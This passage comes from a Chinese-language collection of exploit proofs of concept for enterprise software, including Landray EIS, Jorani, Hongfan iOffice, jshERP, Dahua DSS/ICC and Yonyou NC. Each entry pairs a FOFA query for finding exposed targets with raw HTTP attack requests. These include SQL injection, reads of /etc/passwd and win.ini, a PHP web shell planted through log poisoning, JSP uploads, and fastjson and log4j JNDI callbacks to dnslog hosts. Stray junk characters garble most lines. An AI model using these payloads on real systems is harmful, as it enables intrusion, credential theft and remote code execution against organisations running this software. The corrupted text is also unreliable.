FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
( J+ G( Z8 [. g7 V2 U; FGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1" d" }- A& h8 k2 Y3 ~3 \) w
Host: 127.0.0.1; S9 n9 q. x$ d' M
Pragma: no-cache
- V5 J0 k7 A* b3 f9 cCache-Control: no-cache
0 k3 t m0 ~" U kUpgrade-Insecure-Requests: 1) S; q/ |7 ^5 V- Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( [( m+ }$ |/ Y& Q( O, g! X5 N+ S; CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 x2 E! P1 B4 o$ a" a4 f ^; dAccept-Encoding: gzip, deflate
1 f3 l! s- Z7 t6 E+ m Z; {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8! _9 t; @6 _1 i$ Y S) O
Connection: close" d3 E0 u" \6 E8 f i
3 T8 {4 U K7 f4 v6 F: E$ q( `1 b4 p: o* s' G) u# a; f
12. Jorani < 1.0.2 远程命令执行
* s/ e, |* C" H( c9 H( a# oFOFA:title="Jorani"
# R' A* D. O0 K9 [; {6 d第一步先拿到cookie5 [) \, H1 y) L# U. D
GET /session/login HTTP/1.1
; J9 U/ h/ n- p) O2 e& }/ [Host: 192.168.190.30
6 J$ _% d; c5 G' I, H& E4 RUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% i1 F- h! c n( Z- T W s# YConnection: close
) R0 _, T9 r+ |9 j4 WAccept-Encoding: gzip
* M& j# D% w" W/ i6 T% v
) {" k/ }7 s F- o
0 w) E D9 U ]- v响应中csrf_cookie_jorani用于后续请求
* M& u5 A' N5 f ]1 d3 ~/ h+ @HTTP/1.1 200 OK
- `7 n5 E: N% HConnection: close0 [- U a& ~2 H' ~+ `
Cache-Control: no-store, no-cache, must-revalidate
* B9 H6 H' b# E, D; Y' vContent-Type: text/html; charset=UTF-83 N, B; J+ A, P, N8 b' t" Q
Date: Tue, 24 Oct 2023 09:34:28 GMT
- F# X: E; @- q' y" aExpires: Thu, 19 Nov 1981 08:52:00 GMT/ L( E- k. o2 R/ k/ P ]
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
/ |! a5 v4 |% h; vPragma: no-cache, [5 r/ p7 U5 s8 X
Server: Apache/2.4.54 (Debian)% G+ \0 `" l* {* |$ D" |8 e
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/+ b; N, U; o; I2 L) q! L3 d
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
0 `4 y8 P6 D0 c3 OVary: Accept-Encoding
& z I- N" O$ c7 {7 U2 ~7 G* K8 ^: U% D) w8 P
8 D: l5 v/ _7 w% e; V/ t
POST请求,执行函数并进行base64编码
0 l8 g+ @7 T+ q9 nPOST /session/login HTTP/1.1
' \( F O- v0 I# \Host: 192.168.190.30
! l7 D0 w! p' Z5 d' CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( Z7 m* E6 M, }5 A/ }" GConnection: close9 z2 T8 ? S4 G8 p0 @7 ^
Content-Length: 252
: ?9 ]0 d1 K- I" ]Content-Type: application/x-www-form-urlencoded$ A: T) v! O! H% J/ H3 S. M
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r1 y8 v/ l! C+ h9 G4 [) n8 v; A0 o% o
Accept-Encoding: gzip
$ a; |$ J5 `$ B. v! n8 _. e4 O
& ^1 K1 M1 Y1 y* V: F! ?+ qcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
! i7 H1 L7 Y, M @ J: N5 g1 x& r# h: h- r# _8 ?5 y
2 y* s+ l- i" {0 `7 I1 y* ^) H7 S3 e; G E$ L; |- y/ U! M1 b- t4 v
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串& W# n3 d# S% j$ U$ W0 P; Y) U7 P
GET /pages/view/log-2023-10-24 HTTP/1.1
1 {3 a) B' X- S: T9 [( FHost: 192.168.190.30
; d1 q. u2 g7 O) M EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% L- h4 Q4 c) s. C9 j9 @, i0 C
Connection: close2 A3 o! |/ P; L* {: o: b# j
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r8 ?9 K. k3 \, w1 a4 v) w
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=% l! A% g$ N7 [+ d5 b% F- \7 ?5 G
X-REQUESTED-WITH: XMLHttpRequest0 I; I" ~+ I! _3 F
Accept-Encoding: gzip G1 s' I0 R5 a6 ?
* v/ `2 h. B4 _0 p
+ A! v: w4 I* X4 w- B+ q, h4 `13. 红帆iOffice ioFileDown任意文件读取% J# p; [' \: R/ u3 C% ?# l4 V& F
FOFA:app="红帆-ioffice"8 y: ^7 k, L- ]# F# F3 W& ?
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
8 ?: K% ^* C/ p$ ?; M x5 |Host: x.x.x.x. C7 m6 ^8 o: a# M% U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' \+ K9 u& j! v* z& l) }
Connection: close; k7 ~+ \- D3 @; W, C% x% |& S
Accept: */*# \& D( D/ D: O/ [9 @5 l
Accept-Encoding: gzip& Z9 \6 C1 D6 r `- r: U
& T3 ^4 \% y3 d8 `
3 P9 P+ E: W& P9 J- J14. 华夏ERP(jshERP)敏感信息泄露/ V+ Y# ]# Q2 {" E8 j
FOFA:body="jshERP-boot"3 s n4 O. g B, }$ k
泄露内容包括用户名密码
9 w8 H5 g! s9 f6 UGET /jshERP-boot/user/getAllList;.ico HTTP/1.18 P+ E/ P7 B5 d( ]1 ]; m
Host: x.x.x.x' s$ n' I& m' g% I3 D4 b2 ^& t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36* l4 \4 @* d- Q4 |, }2 J# V
Connection: close' `/ Q6 w R8 V: ^- V$ W. q
Accept: */** K }) w% Q- I4 A+ b7 c8 |; |5 w; a2 k
Accept-Language: en
% |- r& X8 X) D$ ] ~: OAccept-Encoding: gzip" @& B" i |: }
) i, Q- {; D8 K+ u! r' X9 q F# d& ]- Y. w: S- Y: g3 u' O
15. 华夏ERP getAllList信息泄露
. _6 z$ k R0 m5 O2 bCVE-2024-0490
, l& ?( i. @5 ^' ^7 D9 d( ]3 CFOFA:body="jshERP-boot"
/ g( p$ L* G( U6 c4 U6 l- A泄露内容包括用户名密码
) t& l2 z0 P/ L6 f# X$ M8 tGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
1 u- N9 f& G5 j1 l! ^) }4 i" ZHost: 192.168.40.130:100( G. [5 z& L2 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36( L# v/ d' }: L) f6 p
Connection: close
) e. v3 y. m7 ]Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* x/ b- k1 i) e q; C' K
Accept-Language: en
5 }4 s% u1 |, b7 H/ usec-ch-ua-platform: Windows
2 y- C! E1 ]1 v2 ~+ E8 h2 nAccept-Encoding: gzip2 a+ l; e7 d) P2 n0 u3 d$ E) A
, D) G. c6 B; \# `& _5 K2 J# h
* L, ?7 l# W! C, w/ W) c
16. 红帆HFOffice医微云SQL注入0 k( U1 s; K3 \2 z: i8 j
FOFA:title="HFOffice"
) O) o' g( d' ?) ^9 tpoc中调用函数计算1234的md5值' m9 \8 N# {8 i: b$ O* E
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
8 G- C% A) v. y! Z4 EHost: x.x.x.x) W) F3 }1 ~' `3 n
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.363 X1 a* w e8 d7 B- v5 N1 m" c& R
Connection: close5 ~! w7 \7 E' t# |3 {! P
Accept: */*% B; f' \; ]1 h6 P
Accept-Language: en
8 B1 L& k, _, U! u, e$ G( C& @Accept-Encoding: gzip
4 b& o# Y7 [& E* ]% ~0 \
! G4 ~2 G. i: I, l9 S+ _, J" d" Q. d* K1 G; m3 s% k
17. 大华 DSS itcBulletin SQL 注入
: m. y5 H" |* U1 z5 w f' YFOFA:app="dahua-DSS"
5 `$ P3 d' ?8 y5 b' J, z7 ~' DPOST /portal/services/itcBulletin?wsdl HTTP/1.1
/ S( `7 n' f& P3 i6 L+ ]6 n7 G$ nHost: x.x.x.x
! p) a4 q. P) ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! m! ?* A; d: Y( A! u1 s7 ~Connection: close2 e8 h' u( D; [0 c
Content-Length: 3453 ?3 Y% t! K# ~8 _+ _5 m
Accept-Encoding: gzip7 P. o% Y7 @! P& u( M8 U2 D$ v
& P8 A3 A; i+ M" O<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>7 X. V& ]. ?; l; s
<s11:Body>
l& F) {4 i4 k <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>* |! W4 c# `. ? t# ^4 _+ Z
<netMarkings>8 w' ?. J; Q" y5 i" h
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1! y n6 |, j* U, X
</netMarkings>
- |8 U$ ]! C) O' d1 L" @& K; c1 n( v! N </ns1:deleteBulletin>' D& q* [/ b7 Y, S
</s11:Body>8 ?# o" N( l4 Y
</s11:Envelope>
# P2 U K, C% v& y
" B3 ^& \& ?5 f8 i# h$ f: l" ?5 k; I. F. t/ o) V* T
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露; p, G: O* @$ q4 ^
FOFA:app="dahua-DSS"
+ | S, X1 g/ P3 F) N9 c hGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
/ f/ P8 ? U; `& ], }6 N5 k* Z% iHost: your-ip7 ^4 a: K% r. N7 G% Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' B% }# t# A3 e+ ]
Accept-Encoding: gzip, deflate, L# g% u8 V: y3 L& n) p* R# z
Accept: */*3 L4 W# L6 ?0 o7 c0 m% Y
Connection: keep-alive' E1 X# L' B F
& y$ V. P" o3 }# O
$ e+ l- b& x; h e) x% S x2 B$ q3 p
9 ^7 w4 {6 t. z, z! w3 c6 a' D' R19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
; t- A% T" o( B( ~FOFA:app="dahua-DSS"% a/ y' V9 l8 s5 s: n
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.10 e4 Q1 v6 u* _# w: H
Host:
- v7 q7 V6 g Y' RUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36+ y5 A9 o8 F5 I# E8 ~
Accept-Encoding: gzip, deflate' }; v$ Y+ k0 L& i8 t
Accept: */*
2 }' T; ?: i+ O2 n, t/ ~1 }Connection: keep-alive
; U6 z& c9 W% @2 L" d3 U6 f6 F) _' h' D6 ]% f
. X9 Y! r( f* j8 J7 G
20. 大华ICC智能物联综合管理平台任意文件读取9 u: c1 l8 _8 k! G% t) S; U- D
FOFA:body="*客户端会小于800*"& O9 J: t0 X$ z& N; i, B; ]! B3 U
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.19 m# B3 L! w- i) {7 r0 b5 o" S
Host: x.x.x.x
8 M& e8 r3 \4 TUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) I) O0 U- s Y, d% I' U
Connection: close% x2 k* |9 I5 l
Accept: */*
4 q8 D! K# `. B, K+ j5 l' \Accept-Language: en
2 w. G6 o9 u+ D+ Z9 _. \% v, qAccept-Encoding: gzip7 `% l) I) U1 \7 I z
7 J- [. ]( X# f' w1 [+ ]6 U' J
, x! Q' {& M& p/ n. y, }, O21. 大华ICC智能物联综合管理平台random远程代码执行
s0 `) ~9 i& [3 w. cFOFA:icon_hash="-1935899595"$ O& @# z$ a( B5 j0 |
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 n* T1 p& ~5 L8 T
Host: x.x.x.x. B m* P- }, m3 J& k d/ `2 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 F( d6 J4 p% ~, D5 m1 kContent-Length: 161
" n" A: _- e& P) ~1 D; i! y0 ]/ vAccept-Encoding: gzip8 R5 W4 M) l6 k5 D& m( A
Connection: close
& [" V, m( E h$ \ n) J$ L' r! XContent-Type: application/json;charset=utf-8, b; r! l. O$ H9 z- f$ d( {
6 o# O8 D' R. i8 T, ]{ v( \" Q: N2 f1 q3 v( d
"a":{
; G% F7 d+ P) N "@type":"com.alibaba.fastjson.JSONObject",
8 w$ f: g! a/ D7 K# w% z/ E# L- M {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}; Q0 ~3 K( M! C6 e
}""
1 L. U4 n7 ]3 X6 R6 t0 n}9 y/ @/ O x- x7 ~- }" B. h
$ {) R; j1 ~: |
! X9 l8 u5 y8 C/ q22. 大华ICC智能物联综合管理平台 log4j远程代码执行
4 H+ Y' n( c* H7 a" mFOFA:icon_hash="-1935899595"
1 |9 ^) r0 S6 f0 `POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
& `$ p4 Z% s+ Y; _Host: your-ip" h8 ~- O, w# o6 l/ N8 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. C2 ?7 a) g9 R. H% g3 lContent-Type: application/json;charset=utf-8
" D. K. `7 n1 o" f
9 t4 D* N6 S8 c6 H! ]. P{
0 J( o' L3 U& X3 {9 }"loginName":"${jndi:ldap://dnslog}"7 J) q! _7 @7 k- ]7 c3 h
}- b; g& s' |6 Q
9 I& g1 X* i% {% c: `- g, g
& G9 d7 {1 z2 D: C7 w9 t" g
/ n1 M( ?2 l7 ^5 R6 D! `# c23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( C" T1 s4 R t5 s* a+ B0 b+ H% q' |FOFA:icon_hash="-1935899595"
3 N9 x; K4 @- [7 iPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1$ {# M$ ?; a( l
Host: your-ip0 d R9 Y. C! p, L; s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' T4 r" P. E; I9 P
Content-Type: application/json;charset=utf-8$ @; K2 t% S7 [/ s
Accept-Encoding: gzip+ a8 l) f5 v* [3 k R: y
Connection: close
- L7 G" N' g; y$ L G7 J* m
0 ^' C4 K; y! w{# \/ P; `! P1 o( Y. K+ T
"a":{& D3 [, r7 C7 c; w1 j+ T; S
"@type":"com.alibaba.fastjson.JSONObject", K. Q v; r" T0 F7 ~( |- k, v
{"@type":"java.net.URL","val":"http://DNSLOG"}
# n4 E, ~+ X% ]; p: u3 Q }"". ] L4 h' n- `& D+ k3 D H9 B$ `
}
% T V! g3 k4 b M$ \* Q2 [! c. J' e8 U2 N( `; ?
7 M3 R0 d" K1 a8 b- Z% L7 ?
24. 用友NC 6.5 accept.jsp任意文件上传 Q: t% `4 s" x5 ~" M6 x- e
FOFA:icon_hash="1085941792"' b+ h; i: _* O; {
POST /aim/equipmap/accept.jsp HTTP/1.1
" n/ l' T8 E) {$ OHost: x.x.x.x: N1 |1 b' E+ Y: d" b! B
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
1 W% G2 W: U8 D0 T. RConnection: close8 \, u* T: p% V4 Z7 z: R8 t* h
Content-Length: 449
3 k# M7 v! L# T8 LAccept: */* Q' j' g: d% h
Accept-Encoding: gzip
/ C9 @ f9 F$ y: o! L1 yContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ z* P8 k- l" T8 c6 N+ O- |: }! s3 k
0 I& H+ O' M! O p7 d D1 l) o-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 A* w' B8 f0 \: D( {' N
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt") ]8 d4 a- ?( h- N0 E/ }
Content-Type: text/plain" O3 S2 }( Y- {" B8 R
3 L. o2 r/ ~" y<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
7 M, S. C3 F: c2 B-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc7 Z. Z9 A; ?0 H" o$ Q. _
Content-Disposition: form-data; name="fname"! E% O: B- h4 S4 n- v u+ \
+ L* t' q1 M; a% v' P\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp8 Z2 y2 t: k8 o3 g" t2 n6 m/ x4 l
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--8 R2 c0 \ h s1 X' ]; {* T9 \* [! A
! A& ~7 o) m# B) X. N4 U
& ?8 _; Z" h! y' @/ T25. 用友NC registerServlet JNDI 远程代码执行
/ Z2 x! t( x9 zFOFA:app="用友-UFIDA-NC"9 T' _; h2 c5 d2 |; U4 @7 w) }* y
POST /portal/registerServlet HTTP/1.1
2 e5 _2 U1 B9 t( }1 z# I! PHost: your-ip
( K; |: x/ g7 G& ?$ Y* qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.04 l0 |/ [" `& H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
9 v8 G! h; n5 G, {0 S0 Q" ^Accept-Encoding: gzip, deflate: e: q! \! |6 }% \) R( j
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
# d$ u* A( k" C. G* [9 z4 \Content-Type: application/x-www-form-urlencoded, ?2 z) R0 r* E- {7 q
9 C; f" e. t% N7 htype=1&dsname=ldap://dnslog
4 {* D7 [; J% U9 g x( f4 r2 C, F0 q) O! V
! s% ?) M" Y0 N# d! [
9 S; {7 u- ?1 G* `( M! Q# t% _26. 用友NC linkVoucher SQL注入1 x* y2 V. y* O! u, C8 n/ F0 b: o
FOFA:app="用友-UFIDA-NC"
0 M" t, g, r# k/ t# u# G* O6 B6 I& WGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, R% N& q. f. b yHost: your-ip
+ r/ X- d) c5 z8 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( W8 |2 [% N6 b1 H' l8 ?
Content-Type: application/x-www-form-urlencoded
5 w5 Z0 L$ a" z% Y4 ]Accept-Encoding: gzip, deflate
1 X& p; V% W/ V4 K" MAccept: */*
9 E$ c/ [4 F% R% C* _: @3 ]9 yConnection: keep-alive0 ]6 x, L; Q& m8 h; t7 ?2 B( L
' ?& H) K8 ^5 V5 C( l/ G; s' ~# _. l
27. 用友 NC showcontent SQL注入
" j+ E7 H. I( x! p% lFOFA:icon_hash="1085941792") R; P4 W$ e5 k! Z/ Z( |1 U& M
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
" w6 y$ v3 M# ~$ i' G8 y: n# l* ~Host: your-ip% W7 m$ v: T' k+ c& j. J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 K5 t6 r4 W* f, z5 |9 N1 m
Accept-Encoding: identity
2 B' \ K( @+ Z5 VConnection: close: F& P+ \- j, U/ |
Content-Type: text/xml; charset=utf-8+ H# ~! Q2 m2 Y: a
* P+ ]2 m% @* l
* ~$ o" c/ x% g% V) U- W9 A& O r28. 用友NC grouptemplet 任意文件上传1 [( s: _( X [/ F3 m4 ^6 }% O. d
FOFA:icon_hash="1085941792"
' N# Y; Q. j- g0 N P4 z2 [POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
: X: c7 O7 a4 X$ @- Q3 \ w8 NHost: x.x.x.x
$ k/ a7 B3 X# TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36$ J9 D" `3 Z$ s* A0 y1 u
Connection: close# F! G) S" T; m7 b0 {
Content-Length: 268
! V& I. l, y, \9 Z; SContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
) }2 U" T- M( ?( s: cAccept-Encoding: gzip- T: M* }9 n1 q8 \7 w
c" @+ S& H+ {& ~$ m
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, V& l/ n/ u D$ J- L+ l0 [) T
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"6 M) h ~4 Y2 S
Content-Type: application/octet-stream* G: i6 K6 k& |, x/ _8 L" P
/ s) y8 G5 @2 A<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
5 Z; R2 m9 \# o) ^------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--/ t& f! e, X! y) O, b: x
7 p4 Z: G% I. G- x0 P
# ~) e- w7 R/ `2 H) V6 C$ P/uapim/static/pages/nc/head.jsp* I U9 ~/ P9 m% k' `$ |( I
0 Z. C) {6 I A5 Q& G
29. 用友NC down/bill SQL注入9 P/ z7 v! d1 `" P" h$ w
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% L! I. A8 D; f; kGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
e6 M+ f+ K# g0 d y+ J3 y( ZHost: your-ip
6 p a9 m0 Z* {- BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 i' Z# r& U7 r( {7 A0 v
Content-Type: application/x-www-form-urlencoded* a# X" J$ X. W0 w/ |/ u( @
Accept-Encoding: gzip, deflate
/ K% F2 u, f0 h. O- ?8 {Accept: */*) k) Y/ n- }7 c% X4 ^% [! r `( H- x
Connection: keep-alive6 ` B4 o. q& v. s5 m9 i' M, P
: e8 A I/ [+ r8 h. k* s; b: a) u) t8 w3 k V' i
30. 用友NC importPml SQL注入* N1 t2 N. ^( B, ^
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"; @, e9 S% P7 W t* c8 ?
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.17 N3 y6 n: z3 I& X" a( ]1 C
Host: your-ip
a ?# C0 H4 D/ ~, f0 {0 N3 BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
- ]3 _3 @! n. U" |" Y8 v! @1 N: |3 f2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.365 x7 A2 ?( G9 A' u+ v9 E
Connection: close
; P, f' p" ~0 |1 v+ U; B3 c, T" ^% u
------WebKitFormBoundaryH970hbttBhoCyj9V2 g \; }6 [% s( N: K
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"' y$ |1 o: w$ l' w
Content-Type: image/jpeg; o5 t: ]. F$ a& l1 R0 H
------WebKitFormBoundaryH970hbttBhoCyj9V--7 B3 H2 e& H. J& J
1 J0 P/ _5 e* J, S5 d2 P$ `) H) d a4 y4 t% ?2 l
31. 用友NC runStateServlet SQL注入" ^5 ~3 @) \, x" ^) k( |# ~
version<=6.53 E' p. {( |( w, z2 n; f* B
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' l7 o% }9 h$ O9 zGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# ?0 Q4 f. S) f6 z/ s5 b5 x2 V5 B! wHost: host$ I: K, e/ v% S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 M T6 M" g5 O1 t1 e9 J
Content-Type: application/x-www-form-urlencoded
1 a E. |! Z3 Z! C5 F' d9 ]& W: ?7 d! E) A
! t( K; Y1 p. u g# Z. ~32. 用友NC complainbilldetail SQL注入" A( b, w ~# f# B
version= NC633、NC65
7 N% A, e% Q9 ]# O" YFOFA:app="用友-UFIDA-NC"" M; j2 L& m. O$ `/ g, Y x9 w$ V
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 M) Z. F/ l) V5 I% z4 PHost: your-ip
) I. e! G5 }! v- O1 a( [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: d6 K* c' [/ ?5 G
Content-Type: application/x-www-form-urlencoded4 [9 n8 a( I! J+ w l
Accept-Encoding: gzip, deflate3 [9 y/ v& G1 I: Q# w1 Y
Accept: */*. o& E) q5 |. _$ T$ e
Connection: keep-alive
. b% n% T& m/ z5 I8 H2 C2 c5 D9 M
$ F. E! p& y7 |/ u( W: x: q" L2 Z: k6 \; \. W
33. 用友NC downTax/download SQL注入$ p( A! l% s$ {7 ~! r: Y
version:NC6.5FOFA:app="用友-UFIDA-NC"7 n# [3 S. r% g8 {
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 L. P0 j$ s2 h& A/ K1 B$ iHost: your-ip
7 u, x$ @; X; [; ]0 Z4 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ ^" w8 S* n3 \0 H: U! S1 oContent-Type: application/x-www-form-urlencoded
# ^& a8 W' z( ~- JAccept-Encoding: gzip, deflate" {7 h" m3 ?) }! \) I) q
Accept: */*7 l8 O7 A Q3 V f
Connection: keep-alive% m( ^2 {/ n, [% i$ ]
% S2 H6 l4 x6 h. f: U
# [* u$ H w% l2 k5 F
34. 用友NC warningDetailInfo接口SQL注入
5 f5 k! d6 T5 D9 Z# v$ u9 X- ~( g% L" u9 vFOFA:app="用友-UFIDA-NC"4 y( _8 y& q/ L& g4 W
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, g# i+ _' |3 UHost: your-ip
# X+ g) U" [6 H/ \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 j+ M. v: v9 B( D3 I* ]0 ]
Content-Type: application/x-www-form-urlencoded( g! I* K, M% @; V, F$ _. W: _
Accept-Encoding: gzip, deflate4 _. T5 G8 A' |' x9 |
Accept: */*
! J/ ~6 y6 ?- _1 J. ~Connection: keep-alive' O7 Z! P5 D) [1 ]' l
- K, W9 r* J, k2 t! x1 W" X- z
